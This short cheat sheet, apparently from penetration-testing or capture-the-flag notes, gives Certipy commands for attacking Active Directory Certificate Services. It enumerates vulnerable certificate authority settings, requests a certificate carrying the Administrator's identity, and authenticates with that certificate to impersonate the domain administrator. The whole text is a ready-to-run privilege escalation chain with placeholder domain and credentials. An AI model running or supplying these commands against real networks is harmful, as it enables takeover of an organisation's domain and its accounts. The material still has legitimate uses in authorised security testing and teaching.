ADCS
Certipy
Enumerate Certificate Authority configurations to find vulnerable settings:
certipy-ad find -u amogus@{DOMAIN} -p password -vulnerable -stdout -debugRequesting a certificate with certipy:
certipy-ad req -k -no-pass -ca amgs-DC-CA -upn Administrator -target {DOMAIN}Impersonating account with certificate:
certipy-ad auth -pfx admin.pfx -username Administrator -domain {DOMAIN}